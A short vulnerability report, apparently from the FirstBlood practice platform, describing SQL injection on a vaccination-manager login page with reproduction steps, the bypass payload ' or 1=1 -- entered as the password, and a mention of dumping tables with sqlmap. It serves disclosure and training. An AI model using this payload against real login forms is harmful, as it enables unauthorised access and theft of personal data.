FirstBlood-#686Sql injection on /vaccination-manager/login.php
This issue was discovered on FirstBlood v2

On 2021-10-27, newrouge Level 3 reported:

Hey, i found that vaccine-manager login portal is vulnerable to SQLi injection. And bypasses authenticatio and leaks user's PII data.


  1. Go to /vaccination-manager/login.php
  2. Enter username as admin or Admin and password anything' or 1=1 -- true .
  3. Redirected to /portal.php


Along with vaccine portal access, this sql injection can be used to dump all databases on server. Using sqlmap i dumped few tables.

Thank you



Endpoint: /vaccination-manager/login.php

Parameter: password

Payload: anypassword' or 1=1 -- true

FirstBlood ID: 30
Vulnerability Type: SQL Injection

There is an SQL injection on the vaccination management portal login page which results in the user being able to login as the administrator.